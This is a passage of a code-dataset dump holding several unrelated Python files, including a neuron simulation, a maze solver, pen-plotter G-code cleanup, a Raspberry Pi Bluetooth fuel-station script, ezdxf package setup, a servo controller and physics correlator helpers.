h[i], n[i], I[i], p)\n i += 1\n\n return Vm, I\n\n##############################################################################################\n##############################################################################################\n## main program\n\nif __name__ == \"__main__\":\n\n ## set parameters\n p = set_parameters()\n\n ## simulate\n Vm, I = simulate(p)\n\n ## plot results\n plt.figure(1)\n plt.clf()\n\n ### input current\n sp1 = plt.subplot(211)\n plt.plot(p['time'], I, 'k-', lw=3)\n plt.ylabel('input current ($\\mu$A/cm$^2$)')\n plt.xlim(p['time'][0], p['time'][-1])\n offset = 0.1 * np.abs(np.max(I) - np.min(I))\n plt.ylim(np.min(I) - offset, np.max(I) + offset)\n sp1.set_position([0.1, 0.65, 0.8, 0.3])\n plt.setp(plt.gca(), xticklabels=[])\n\n ### membrane potential\n sp2 = plt.subplot(212)\n plt.plot(p['time'], Vm, 'k-', lw=3)\n plt.ylabel('membrane potential (mV)')\n plt.xlabel('time (ms)')\n plt.xlim(p['time'][0], p['time'][-1])\n offset = 0.1 * np.abs(np.max(Vm) - np.min(Vm))\n plt.ylim(np.min(Vm) - offset, np.max(Vm) + offset)\n sp2.set_position([0.1, 0.1, 0.8, 0.5])\n\n plt.savefig('hh_membrane_pot', format='pdf', bbox_inches='tight')\n plt.show()\n","sub_path":"pettersen_einevoll/action_potential/hh.py","file_name":"hh.py","file_ext":"py","file_size_in_byte":7594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"344257328","text":"READ_FILE=True\n\nif(READ_FILE):\n import sys\n sys.stdin=open('in.txt', 'r')\n print(\"read from file\")\n\nn, m=int(input(\"length:\" if not READ_FILE else \"\")), int(input(\"width:\" if not READ_FILE else \"\"))\n\nif(not READ_FILE):\n print(\"input matrix:\")\nmaze=[]\nfor i in range(m):\n s=input().split()\n for i in range(n):\n s[i]=int(s[i])\n maze.append(s)\n\ndirection=[[0, -1], [0, 1], [1, 0], [-1, 0]]\nsolution=[]\n\ndef Add(a, b):\n return [a[0]+b[0], a[1]+b[1]]\n\ndef Valid(a):\n return a[0]>=0 and a[0]=0 and a[1] 0:\n (dist, reverse, nearest) = min(dist_reverse_iterator(gs),\n key=itemgetter(0, 1))\n gs.remove(nearest)\n\n if reverse:\n prev = nearest.reversed_copy()\n else:\n prev = nearest\n\n ordered.append(prev)\n\n return ordered\n\ndef prune_small_distance_penups(instructions):\n instructions = iter(instructions)\n try:\n prev = next(instructions)\n except StopIteration:\n raise ValueError(\"instructions empty\")\n # The first instruction should always be a penup, so we send it straight\n # through.\n yield prev\n\n try:\n while True:\n current = next(instructions)\n if current.typename == 'penup':\n last_down = prev\n penup = current\n\n # Get all moves while the pen is up. There should only ever be\n # one, but you never know these days. :-)\n moves = []\n try:\n while True:\n penup_move = next(instructions)\n if penup_move.typename == 'pendown':\n pendown = penup_move\n break\n else:\n moves.append(penup_move)\n except StopIteration:\n # If we reach the end of the instructions while looking for\n # a pendown, raise the pen and call it good.\n yield penup\n raise StopIteration\n\n if calculate_distance(moves[-1].coords, last_down.coords) <= min_penup_travel_distance:\n # The penup move(s) didn't travel the minimum desired distance,\n # so we remove them from the list of instructions and continue\n # to the next instruction.\n continue\n else:\n # The penup move(s) DID move enough, so we keep them.\n yield penup\n for move in moves:\n yield move\n yield pendown\n else:\n yield current\n prev = current\n\n except StopIteration:\n pass\n\ndef clean_instructions(instructions):\n cleaned = []\n is_pen_up = True\n clean_instructions.prev = None\n\n def keep_instruction(instruction):\n if (instruction.typecode == \"G0\" and instruction.coords is not None):\n if ((clean_instructions.prev.typename == 'pendown') and clean_instructions.prev is not None) and (\"F\" not in instruction.line):\n # Insert feed rate for first pendown move\n instruction.line = replace_text_between(instruction.line, \"G0 \", \"X\", feedrate_value + \" \")\n elif (\"F\" in instruction.line):\n # Remove feed rate for next moves\n instruction.line = replace_text_between(instruction.line, \"G0 \", \"X\", \"\")\n \n clean_instructions.prev = instruction\n cleaned.append(instruction)\n\n for instruction in instructions:\n if instruction.typename == 'penup':\n is_pen_up = True\n elif instruction.typename == 'pendown':\n is_pen_up = False\n\n if (instruction.typecode == \"G1\"):\n if is_pen_up:\n # Keep G1 instruction if pen is up\n keep_instruction(instruction)\n else:\n # If pen is down, it should be a G0 move.\n # Only keep if it travels a distance\n if(clean_instructions.prev is not None and clean_instructions.prev.coords):\n\n if calculate_distance(clean_instructions.prev.coords, instruction.coords) > 0:\n instruction.typecode = \"G0\"\n instruction.line = instruction.line.replace(\"G1\", \"G0\")\n keep_instruction(instruction)\n else:\n\n if instruction.typecode == \"G0\" and instruction.coords is not None and clean_instructions.prev is not None and clean_instructions.prev.coords is not None:\n if not (calculate_distance(clean_instructions.prev.coords, instruction.coords) > 0):\n # Skip duplicate instruction\n continue\n \n # Keep these instructions\n keep_instruction(instruction)\n\n return cleaned\n\ndef dedupe(gs):\n \"Use Glyph.__hash__() to dedupe the list of glyphs\"\n seen = set()\n for g in gs:\n h = hash(g)\n if h not in seen:\n yield g\n seen.add(h)\n\ndef iter_instructions(gs):\n # be sure to start with a penup\n yield Instruction(penup_value)\n for g in gs:\n for i in g.ordered_instructions():\n yield i\n","sub_path":"lib.py","file_name":"lib.py","file_ext":"py","file_size_in_byte":11525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"319515573","text":"# ------------------------------------------------------------------------------------------------------------------------------------------------------ Importes necesarios.\n\nimport os \nimport json\nimport time\nimport random\nimport httplib2\nimport bluetooth\nimport threading\nfrom sense_hat import SenseHat\n\n# ------------------------------------------------------------------------------------------------------------------------------------------------------ Comentarios codigos Bluethoot.\n\n'''\nRaspberryJ - B8:27:EB:61:92:70\n\nCodigos usados para la comunicacion bluetooth:\n \n- DgnV: Codigo usado para iniciar la comunicacion, es usado por el auto para \n solicitar el id de la estacion, junto a este mensaje se envia el id del auto.\n \n- sjC1: Codigo usado para responder a la solicitud de inicio de una comunicacion,\n es usado por la estacion para responder al codigo DgnV enviado por al auto,\n junto a este mensaje se envia el id de la estacion.\n \n- 8ESt: Codigo usado por el auto para solicitar combustible, es acompañado de la\n cantidad y el tipo de combustible solicitado.\n \n- wjOL: Codigo usado por la estacion para confiramr el incio del envio de unidades de combustible.\n \n- R7d0: Codigo usado por la estacion para transferir una unidad de combustible al auto.\n\n- aDYT: Codigo usado por la estacion para confirmar la finalizacion de envio de unidaes de combustible.\n \n- Ca5n: Codigo usado por el auto para indicar que ya tiene el tanque lleno. \n \n- QD1F: Codigo usado por el auto para finalizar la comunicacion.\n \n'''\n\n# ------------------------------------------------------------------------------------------------------------------------------------------------------ Variables globales Bluethoot.\n\nsock = \"\"\npuertoEnviar = 1\npuertoEscuchar = 2\ndatosRecividos = \"\"\nmacEstacion = \"B8:27:EB:14:B2:5F\"\n\n# ------------------------------------------------------------------------------------------------------------------------------------------------------ Variables globales Http.\n\nidAuto = 789456123\nhttp = httplib2.Http()\nhttplib2.debuglevel = 0\nservidor = \"7d904b1a.ngrok.io\" #<-------------------- Cambiar.\nheaders = {'Content-Type': \"application/json\"}\nurl1 = \"https://\" + servidor + \"/myApp/rest/estacion/\"\nurl0 = \"https://\" + servidor + \"/myApp/rest/vehiculo/enviarDeposito/\"\n\n# ------------------------------------------------------------------------------------------------------------------------------------------------------ Variables globales control.\n\nbloqueo = False\nidEstacion = \"\"\nconexionI = False\nconexionB = False\nnivelCombustible = 48\nlock = threading.Lock()\n\n# ------------------------------------------------------------------------------------------------------------------------------------------------------ Variables globales animacion.\n\nsense = SenseHat()\nlista = [(0, 0, 0) for i in range(7+1)]\ndisplay = [list(lista) for i in lista]\n\n# ------------------------------------------------------------------------------------------------------------------------------------------------------ Segmento de funciones de animacion.\n\ndef matrizatupla(matriz):\n tupla = []\n for vector in matriz:\n for elemento in vector:\n tupla.append(elemento)\n return tuple(tupla)\n\n\ndef animacion_internet(color):\n global display\n lock.acquire()\n for i in range(0, 8):\n display[i][0] = color\n lock.release()\n refrescar_dispaly()\n\n\ndef animacion_bluetooth(color):\n global display\n lock.acquire()\n for i in range(0, 8):\n display[i][1] = color\n lock.release()\n refrescar_dispaly()\n \n \ndef animacion_cambiar_nivel_tanque(nivelCombustible):\n global display\n cont = 0\n if nivelCombustible <= 14:\n for i in range(0, 8):\n for y in range(2, 8):\n if cont < nivelCombustible:\n lock.acquire()\n display[i][y] = (204, 0, 0)\n lock.release()\n cont += 1\n else:\n lock.acquire()\n display[i][y] = (0,0,0)\n lock.release()\n elif nivelCombustible > 14:\n for i in range(0, 8):\n for y in range(2, 8):\n if cont < nivelCombustible:\n lock.acquire()\n display[i][y] = (0, 128, 0)\n lock.release()\n cont += 1\n else:\n lock.acquire()\n display[i][y] = (0,0,0)\n lock.release()\n refrescar_dispaly()\n \n \ndef refrescar_dispaly():\n sense.set_pixels(matrizatupla(display))\n\n# ------------------------------------------------------------------------------------------------------------------------------------------------------ Segmento de funciones Bluethoot.\n\ndef configurar_conexion():\n os.system(\"sudo hciconfig 0 up\")\n os.system(\"sudo hciconfig 0 reset\")\n os.system(\"sudo hciconfig 0 piscan\")\n os.system(\"sudo hciconfig 0 sspmode 0\")\n\n\ndef recivir_datos_bluetooth_de_estacion():\n global datosRecividos\n while True:\n try:\n server_sock = bluetooth.BluetoothSocket(bluetooth.RFCOMM)\n server_sock.bind((\"\", puertoEscuchar))\n while True:\n server_sock.listen(puertoEscuchar)\n client_sock, address = server_sock.accept()\n data = client_sock.recv(1024)\n datos = json.loads(data.decode('utf8'))\n datosRecividos = datos\n except:\n configurar_conexion()\n \n\n\ndef establecer_conexion_con_estacion():\n while True:\n try:\n sock = bluetooth.BluetoothSocket(bluetooth.RFCOMM)\n sock.connect((str(macEstacion), puertoEnviar))\n return sock\n break\n except:\n configurar_conexion()\n\n\ndef enviar_datos_bluetooth_hacia_estacion(info):\n global sock\n while True:\n try:\n sock.send(json.dumps(info))\n break\n except:\n sock = establecer_conexion_con_estacion()\n\n# ------------------------------------------------------------------------------------------------------------------------------------------------------ Segmento de funciones de comprobacion.\n\ndef comprobar_internet_bluetooth():\n global conexionI\n global conexionB\n while True:\n try:\n urlc = \"https://serviciorest2.herokuapp.com/myApp/rest/sensores/\"\n info = {\n 'identificacion_dispositivo': idAuto,\n 'fecha_actualizacion': str(time.strftime(\"%d/%m/%Y\")) + \" - \" + str(time.strftime(\"%H:%M:%S\"))\n }\n http.request(urlc, 'PUT', json.dumps(info), headers=headers)\n animacion_internet((0, 52, 154))\n conexionI = True\n except: \n animacion_internet((0, 0, 0))\n conexionI = False\n try:\n dispositivos = bluetooth.discover_devices(lookup_names=False)\n if macEstacion in dispositivos:\n animacion_bluetooth((102, 0, 102))\n conexionB = True\n else:\n animacion_bluetooth((0, 0, 0))\n conexionB = False\n except:\n configurar_conexion()\n\n# ------------------------------------------------------------------------------------------------------------------------------------------------------ Segmento de funciones http.\n\ndef consultar_estacion(idEstacion):\n url2 = url1 + str(idEstacion)\n resp_headers, datos = http.request(url2, 'GET')\n datos = json.loads(datos.decode('utf-8'))\n return datos\n \n \ndef realizar_deposito(idEstacion, idAuto, fuel, cantidad, valor):\n info = {\n \"idEstacion\": idEstacion,\n \"idCarro\": idAuto,\n \"fuel\": fuel,\n \"cantidad\": cantidad,\n \"valor\": valor\n }\n http.request(url0, 'POST', json.dumps(info), headers=headers)\n\n# ------------------------------------------------------------------------------------------------------------------------------------------------------ Segmento de funciones secundarias.\n\ndef llenar_tanque():\n \n global saldo\n global bloqueo\n global idEstacion\n global datosRecividos\n global nivelCombustible\n \n enviar_datos_bluetooth_hacia_estacion({'Codigo': \"DgnV\", 'ID': idAuto})\n print(\"Estado: Se envio el id del auto.\")\n \n while True:\n print(\"Estado: En espera del id de la estacion.\")\n time.sleep(2)\n try:\n if datosRecividos['Codigo'] == \"sjC1\":\n idEstacion = datosRecividos['ID']\n print(\"Estado: Se recivio el id de la estacion.\")\n break\n except: pass\n \n datosEstacion = consultar_estacion(idEstacion)\n \n print(\"Estado: Se consulto la estacion contra la blockchain.\")\n \n valor = datosEstacion['Deposit']\n seleccionCombustible = random.choice(datosEstacion['fuels'])\n tipoCombustible = seleccionCombustible[\"TipoGas\"]\n \n realizar_deposito(idEstacion, idAuto, tipoCombustible, 7, valor)\n print(\"Estado: Se realizo el deposito en la blockchain.\")\n \n enviar_datos_bluetooth_hacia_estacion({'Codigo': \"8ESt\", 'Tipo': tipoCombustible, 'Cantidad': 7})\n print(\"Estado: Se solicito a la estacion el combustible.\")\n \n while True:\n try:\n if datosRecividos['Codigo'] == \"wjOL\":\n print(\"Estado: Se recivio el mensaje de incio de transferencia de combustible de la estacion.\")\n bloqueo = True\n while True:\n try:\n if datosRecividos['Codigo'] == \"R7d0\" and nivelCombustible < 48:\n print(\"Estado: Se recivio una unidad de combustible de la estacion.\")\n nivelCombustible += 1\n animacion_cambiar_nivel_tanque(nivelCombustible)\n datosRecividos = \"\"\n if nivelCombustible == 48:\n enviar_datos_bluetooth_hacia_estacion({'Codigo': \"Ca5n\"})\n print(\"Estado: Se envio mensaje de tanque lleno.\")\n if datosRecividos['Codigo'] == \"aDYT\":\n print(\"Estado: Se recivio el mensaje de finalizacion de transferencia de combustible de la estacion.\")\n bloqueo = False\n break\n except: pass\n break\n except: pass\n \n enviar_datos_bluetooth_hacia_estacion({'Codigo': \"QD1F\"})\n print(\"Estado: Se envio el mensaje de finalizacion de transferencia a la estacion.\")\n\n# ------------------------------------------------------------------------------------------------------------------------------------------------------ Segmento de funciones principales.\n\ndef vaciar_tanque():\n global bloqueo\n global nivelCombustible\n while True:\n if nivelCombustible > 0 and bloqueo == False:\n animacion_cambiar_nivel_tanque(nivelCombustible)\n nivelCombustible -= 1\n time.sleep(6)\n\n\ndef tanquear_auto():\n global conexionI\n global conexionB\n while True:\n event = sense.stick.wait_for_event()\n event = str(event.action)\n if event == \"pressed\":\n while True:\n if conexionI is True and conexionB is True:\n print(\"Estado: Condiciones para iniciar llenado de tanque satisfechas.\")\n llenar_tanque()\n break\n\n# ------------------------------------------------------------------------------------------------------------------------------------------------------ Segmento del flujo principal.\n\nsense.clear()\n\nconfigurar_conexion()\n\nhilo_servidor_bluetooth = threading.Thread(target = recivir_datos_bluetooth_de_estacion)\nhilo_servidor_bluetooth.start()\n\nhilo_comprobar_internet_bluetooth = threading.Thread(target = comprobar_internet_bluetooth)\nhilo_comprobar_internet_bluetooth.start()\n \nhilo_vaciar_tanque = threading.Thread(target = vaciar_tanque)\nhilo_vaciar_tanque.start()\n\nhilo_tanquear_auto = threading.Thread(target = tanquear_auto)\nhilo_tanquear_auto.start()\n\nprint(\"Estado: Todos los hilos lanzados.\")\n ","sub_path":"Scripts Raspberry/Estaciones autonomas/IOT-Bluethoot-Auto V3.py","file_name":"IOT-Bluethoot-Auto V3.py","file_ext":"py","file_size_in_byte":12299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"79725635","text":"# Copyright (C) 2011-2020, Manfred Moitzi\n# License: MIT License\nimport sys\nimport os\nfrom .version import version, __version__\n\nVERSION = __version__\n__author__ = \"mozman \"\n\nTRUE_STATE = {'True', 'true', 'On', 'on', '1'}\nPYPY = hasattr(sys, 'pypy_version_info')\nPYPY_ON_WINDOWS = sys.platform.startswith('win') and PYPY\nEZDXF_TEST_FILES = os.getenv('EZDXF_TEST_FILES', '')\n\n# Set EZDXF_AUTO_LOAD_FONTS to \"False\" to deactivate auto font loading,\n# if this this procedure slows down your startup time and font measuring is not\n# important to you. Fonts can always loaded manually: ezdxf.fonts.load()\nEZDXF_AUTO_LOAD_FONTS = os.getenv('EZDXF_AUTO_LOAD_FONTS', 'True') in TRUE_STATE\n\n# name space imports - do not remove\nfrom ezdxf.options import options\nfrom ezdxf.colors import (\n int2rgb, rgb2int, transparency2float, float2transparency,\n)\nfrom ezdxf.lldxf import const\nfrom ezdxf.lldxf.validator import is_dxf_file, is_dxf_stream\nfrom ezdxf.filemanagement import readzip, new, read, readfile, decode_base64\nfrom ezdxf.tools.standards import (\n setup_linetypes, setup_styles,\n setup_dimstyles, setup_dimstyle,\n)\nfrom ezdxf.tools import pattern, fonts\nfrom ezdxf.render.arrows import ARROWS\nfrom ezdxf.lldxf.const import (\n DXFError, DXFStructureError, DXFVersionError, DXFTableEntryError,\n DXFAppDataError, DXFXDataError, DXFAttributeError, DXFValueError,\n DXFKeyError, DXFIndexError, DXFTypeError, DXFBlockInUseError,\n InvalidGeoDataException, InsertUnits,\n ACI, DXF12, DXF2000, DXF2004, DXF2007, DXF2010, DXF2013, DXF2018,\n)\n# name space imports - do not remove\n\nimport codecs\nfrom ezdxf.lldxf.encoding import (\n dxf_backslash_replace, has_dxf_unicode, decode_dxf_unicode,\n)\n\n# setup DXF unicode encoder -> '\\U+nnnn'\ncodecs.register_error('dxfreplace', dxf_backslash_replace)\n\n# Load font support automatically:\nif EZDXF_AUTO_LOAD_FONTS:\n fonts.load()\n\nYES_NO = {True: 'yes', False: 'no'}\n\n\ndef print_config(func=print, verbose=False):\n from pathlib import Path\n from ezdxf.acc import USE_C_EXT\n\n func(f\"ezdxf v{__version__} @ {Path(__file__).parent}\")\n func(f\"Python version: {sys.version}\")\n func(f\"using C-extensions: {YES_NO[USE_C_EXT]}\")\n func(f\"using Matplotlib: {YES_NO[options.use_matplotlib]}\")\n if verbose:\n font_cache_dir = options.font_cache_directory\n if font_cache_dir is False:\n font_cache_dir = 'internal'\n func(f\"font cache directory: {font_cache_dir}\")\n func(f\"default text style: {options.default_text_style}\")\n func(f\"default dimension text style: \"\n f\"{options.default_dimension_text_style}\")\n func(f\"load proxy graphic: {YES_NO[options.load_proxy_graphics]}\")\n func(f\"store proxy graphic: {YES_NO[options.store_proxy_graphics]}\")\n func(f\"log unprocessed tags: {YES_NO[options.log_unprocessed_tags]}\")\n func(f\"filter invalid XDATA group codes: \"\n f\"{YES_NO[options.filter_invalid_xdata_group_codes]}\")\n for v in options.CONFIG_VARS:\n func(f\"{v}={os.environ.get(v, '')}\")\n","sub_path":"src/ezdxf/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"626753899","text":"import RPi.GPIO as GPIO\nimport time\n\nclass servo_controller:\n\n def __init__(self):\n print(\"init servo_controller\")\n self.servoPIN = 11 # change\n GPIO.setmode(GPIO.BOARD)\n GPIO.setup(self.servoPIN, GPIO.OUT)\n \n self.servo = GPIO.PWM(self.servoPIN, 50) # GPIO 11 for PWM with 50Hz\n self.servo.start(0) # Initialization\n time.sleep(2) # wait 2 seconds\n self.reset()\n print(\"servo initialized and reset\")\n\n def show(self):\n print(\"show()\")\n\n def rotate(self, amount):\n if float(amount) < 0 or float(amount) > 180:\n print(\"invalid rotation angle\")\n else:\n duty = 2 + float(amount/18) #duty 2 to 12 range \n self.servo.ChangeDutyCycle(duty)\n time.sleep(0.5)\n print(\"rotated servo position to \" + str(amount) + \"degrees\")\n self.wait()\n \n #move servo back to angle of zero\n def reset(self):\n self.servo.ChangeDutyCycle(2)\n time.sleep(0.5)\n print(\"reset servo position to 0 degrees\")\n self.wait()\n\n def wait(self):\n self.servo.ChangeDutyCycle(0)\n time.sleep(0.5)\n print(\"in wait\")\n\n def stop(self):\n print(\"terminating servo\")\n self.servo.stop()\n GPIO.cleanup()\n","sub_path":"python_files/servo_controller.py","file_name":"servo_controller.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"59384015","text":"import random\n\ncard_type = ('heart','spades','club','diamond')\n\ncard_num = ['A','2','3','4','5','6','7','8','9','10','J','Q','K']\n\ndef produce():\n Pairs = []\n for type in card_type:\n for num in card_num:\n Pairs.append((type, num))\n\n Pairs.append(('joker', 'big'))\n Pairs.append(('joker', 'small'))\n\n random.shuffle(Pairs)\n A = Pairs[0:17]\n B = Pairs[17:34]\n C = Pairs[34:51]\n remain = Pairs[51:54]\n\n print(\"Player A: \", A)\n print(\"Player B: \", B)\n print(\"Player C: \", C)\n print(\"Remaining cards: \", remain)\n return\n\nwhile True:\n user_operation = input(\"Shuffle cards?\\n yes or no\")\n if user_operation == 'yes':\n produce()\n elif user_operation == 'no':\n break\n else:\n continue","sub_path":"shuffle-cards/shuffle_cards.py","file_name":"shuffle_cards.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"368055415","text":"def area_rectangulo(base,altura):\n \"\"\"\n Calcula el area del rectangulo\n\n Arg:\n base y altura (int or float)\n Return:\n area(Float)\n \"\"\"\n if base > 0 and altura > 0:\n area = base * altura\n else: \n print(\"Los parametos ingresados de base y altura no son los correctos\")\n area = 0 \n return print(\"Esta es el area del rectangulo {}\".format(area))\n\n##area_rectangulo(1.5,6.5)\n\ndef area_circulo(r):\n \"\"\"\n Calcula el area del circulo\n\n Arg:\n radio (int or float)\n Return:\n area(Float)\n \"\"\"\n import math\n A = (r**2)*(math.pi)\n return print(\"El area del circulo es: {}\".format(A))\n\n##area_circulo(5)\n\ndef relacion(a,b):\n \"\"\"\n Calcula la relacio de dos numeros\n\n Arg:\n Dos numeros enteros a y b (int)\n Return:\n 1 A>B\n -1 B>A\n 0 A=B\n \"\"\"\n if a > b:\n r = 1\n elif b > a:\n r = -1\n else:\n r = 0\n return print(\"La relacion de los numero a y b es igual: {}\".format(r))\n\n##relacion (5,10)\n\ndef separar(*lista):\n \"\"\"\n Dada un lista separa en numeros pares e impares\n\n Arg:\n Indeterminado lista de numeros\n Return:\n Lista pares[] en formaa ordenada\n Lista impares[] en forma ordenada\n \"\"\"\n pares = []\n impares = []\n for i in lista:\n rest = i % 2\n if rest==0:\n pares.append(i)\n else:\n impares.append(i)\n return print(\"Lista pares: {}\".format(sorted(pares))) , print(\"Lista impares: {}\".format(sorted(impares)))\n\n\nseparar(6,5,2,1,7,8,9,88,66,55,66,105,100,1,3,9,7,26,44,65665,55)\n\n","sub_path":"ejerciciospracticafunciones.py","file_name":"ejerciciospracticafunciones.py","file_ext":"py","file_size_in_byte":1642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"158723605","text":"import app\nfrom app.models import Chat, Text\n\ndb = app.db\n\n\ndef consolidate_for_user(email):\n \"\"\" This takes all chats from `email` and consolidates them\n into one text field. This makes it easier to do full text searches.\n\n Note: it doesn't append, but replaces everything in Text.text. but\n it's fast. whatever.\n \"\"\"\n chats = Chat.query.filter_by(sender=email).all()\n\n print(\"Getting all text.\")\n all_text = \"\"\n for chat in chats:\n all_text += u\" {}\".format(chat.text)\n\n print(\"Creating new Text entry.\")\n existing = Text.query.filter_by(sender=email).first()\n if existing:\n existing.text = all_text\n else:\n new_text = Text(sender=email, text=all_text)\n db.session.add(new_text)\n\n db.session.commit()\n print(\"Finished consolidating text for {}\".format(email))\n\n\ndef consolidate_text():\n users = [\n \"mskeving@gmail.com\",\n \"philrha@gmail.com\",\n ]\n for u in users:\n consolidate_for_user(u)\n","sub_path":"scripts/consolidate_text.py","file_name":"consolidate_text.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"39615674","text":"#!/usr/bin/env python\n# encoding: utf-8\n\n\"\"\"\n@Author: yangwenhao\n@Contact: 874681044@qq.com\n@Software: PyCharm\n@File: plt_time_weight.py\n@Time: 2020/11/28 13:35\n@Overview:\n\"\"\"\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom matplotlib.backends.backend_pdf import PdfPages\nfrom scipy import interpolate\n\nimport Process_Data.constants as c\nfrom Lime import gassuan_weight\n# from Process_Data.xfcc.common import get_filterbanks\n\ntime_data = np.load('Lime/LoResNet8/timit/soft/time.data.pickle', allow_pickle=True)\n\ndata = time_data[0][0]\ngrad = time_data[0][1]\n\nfig = plt.figure(figsize=(8, 6))\n\n# fig.tight_layout() # 调整整体空白\n# plt.subplots_adjust(left=0, bottom=0, right=1, top=1, hspace=0, wspace=0)\n\n\nax = plt.subplot(312)\nplt.imshow(data.transpose(), aspect='auto')\nax.set_xticklabels([])\nax.set_title('Log Spectrogram')\n\nax = plt.subplot(311)\nplt.plot(np.log(np.exp(data).sum(axis=1)))\nplt.xlim(0, 320)\nax.set_xticklabels([])\nax.set_title('Log Power Energy')\n\nax = plt.subplot(313)\nplt.plot(np.abs(grad).mean(axis=1)/np.abs(grad).mean(axis=1).sum())\nplt.xlim(0, 320)\nax.set_title('Gradient along time axis')\n\n\n# plt.subplot(414)\n# plt.plot(np.abs(data).mean(axis=1)/np.abs(data).mean(axis=1).sum()*np.abs(grad).mean(axis=1))\n# plt.xlim(0, 320)\n\n\n# fb64_m = 700 * (10 ** (fb64_m / 2595.0) - 1)\n\n# plt.ylabel('Weight', fontsize=18)\n# plt.xlabel('Frequency', fontsize=18)\n# pdf.savefig()\n# pdf.close()\nplt.show()\n","sub_path":"Lime/Plot/plt_time_weight.py","file_name":"plt_time_weight.py","file_ext":"py","file_size_in_byte":1434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"235801152","text":"\nfrom physics import *\n\ndef phase_multiplied(ctc,dia):\n#\tif ctc[\"name\"] == \"N-N\":\n#\t\treturn False\n#\treturn True\n\treturn False\n\ndef get_normalization_factor_for_diagram(ctc,dia):\n\tif ctc[\"name\"] == \"pixN-pixN\" and dia in range(2,7+1,1):\n\t\treturn float(1)/float(12)\n\telse:\n\t\treturn float(1)\n\n# direct B and W Z\n#correction_factors_for_piN_piN = {0:1,1:1, 2:1,3:1,4:-1,5:-1,6:-1,7:1, 8:1,9:-1,10:1,11:1}\n# exchanged MB_MB 3 <-> 2 and oet 0 <-> 1\n#correction_factors_for_piN_piN = {0:1,1:1, 2:-1,3:-1,4:1,5:1,6:1,7:-1, 8:1,9:-1,10:-1,11:-1}\ncorrection_factors_for_piN_piN = {0:1,1:1, 2:1,3:1,4:-1,5:-1,6:-1,7:1, 8:-1,9:1,10:1,11:1}\n\ndef get_correction_factor_for_pixN_pixN_diagram(ctc,dia):\n\tassert(ctc[\"name\"] == \"pixN-pixN\")\n\t# an additional overall minus sign\n\treturn float(correction_factors_for_piN_piN[dia])\n\ndef get_correction_factor_for_old_piN2piN_executable(ctc):\n\tname = ctc[\"name\"]\n\tif name == \"pi-pi\":\n\t\treturn 1\n\tif name == \"N-N\":\n\t\treturn 1\n\tif name == \"D-D\":\n\t\treturn 1\n\treturn -1\n\nN_source_factors = {5:-1j, 4:-1j, 6:-1j, 0:-1j}\nD_source_factors = {1:-1j, 2:+1j, 3:-1j}\npixN_source_factors = {5:+1, 4:+1, 6:+1, 0:-1}\n\nN_sink_factors = {5:+1j, 4:+1j, 6:+1j, 0:+1j}\nD_sink_factors = {1:+1j, 2:+1j, 3:+1j}\npixN_sink_factors = {5:-1, 4:-1, 6:-1, 0:-1}\n\ndef get_source_factor(state,gamma):\n\tif state == \"N\":\n\t\treturn N_source_factors[gamma]\n\tif state == \"D\":\n\t\treturn D_source_factors[gamma]\n\tif state == \"pixN\":\n\t\treturn pixN_source_factors[gamma]\n\ndef get_sink_factor(state,gamma):\n\tif state == \"N\":\n\t\treturn N_sink_factors[gamma]\n\tif state == \"D\":\n\t\treturn D_sink_factors[gamma]\n\tif state == \"pixN\":\n\t\treturn pixN_sink_factors[gamma]\n\ndef get_aff_type(ctc,dia):\n\tif ctc[\"name\"] == \"pi-pi\":\n\t\treturn \"piN_piN_oet\"\n\tif ctc[\"name\"] != \"pixN-pixN\":\n\t\treturn \"B_B\"\n\tif dia in range(2,8):\n\t\treturn \"MB_MB\"\n\telse:\n\t\treturn \"piN_piN_oet\"\n\ndef get_aff_type_2ndversion(ctc,dia):\n\tif ctc[\"name\"] == \"pi-pi\":\n\t\treturn \"pi_pi_oet\"\n\tif ctc[\"name\"] != \"pixN-pixN\":\n\t\treturn \"B_B\"\n\tif dia in range(2,8):\n\t\treturn \"MB_MB\"\n\telse:\n\t\treturn \"piN_piN_oet\"\n\nclass default_input_data_properties_type:\n\n\tdef phase_multiplied(self,ctc,dia):\n\t\treturn False \n\n\tdef get_normalization_factor_for_diagram(self,ctc,dia):\n\t\tif ctc[\"name\"] == \"pixN-pixN\" and dia in range(2,7+1,1):\n\t\t\treturn float(1)/float(12)\n\t\telse:\n\t\t\treturn float(1)\n\n\tdef get_real_dia(self,ctc,dia):\n\t\treturn dia\n\n\tdef get_factor_for_correlator(self,ctc):\n\t\tname = ctc[\"name\"]\n\t\tif name == \"pi-pi\":\n\t\t\treturn 1j*(-1j)\n\t\tgammas = ctc[\"gammas\"]\n\t\tif name == \"N-N\":\n\t\t\treturn get_sink_factor(\"N\",gammas[0])*get_source_factor(\"N\",gammas[1])\n\t\tif name == \"D-D\":\n\t\t\treturn get_sink_factor(\"D\",gammas[0])*get_source_factor(\"D\",gammas[1])\n\t\tif name == \"pixN-D\":\n\t\t\treturn get_sink_factor(\"D\",gammas[0])*get_source_factor(\"pixN\",gammas[1])\n\t\tif name == \"pixN-pixN\":\n\t\t\treturn get_sink_factor(\"pixN\",gammas[0])*get_source_factor(\"pixN\",gammas[1])\n\n\tdef get_factor_for_diagram(self,ctc,dia):\n\t\treturn np.complex128(self.get_factor_for_correlator(ctc))\n\n\tdef get_aff_filename(self,ctc,dia,tsrc,conf):\n\t\ttype = get_aff_type(ctc,dia)\n\t\tsamplestr = \"\"\n\t\tif type == \"piN_piN_oet\":\n\t\t\tsamplestr = \".sample00\"\n\t\treturn \"%s.%04d%s.tsrc%02d.aff\" % (type,conf,samplestr,tsrc)\n\nclass 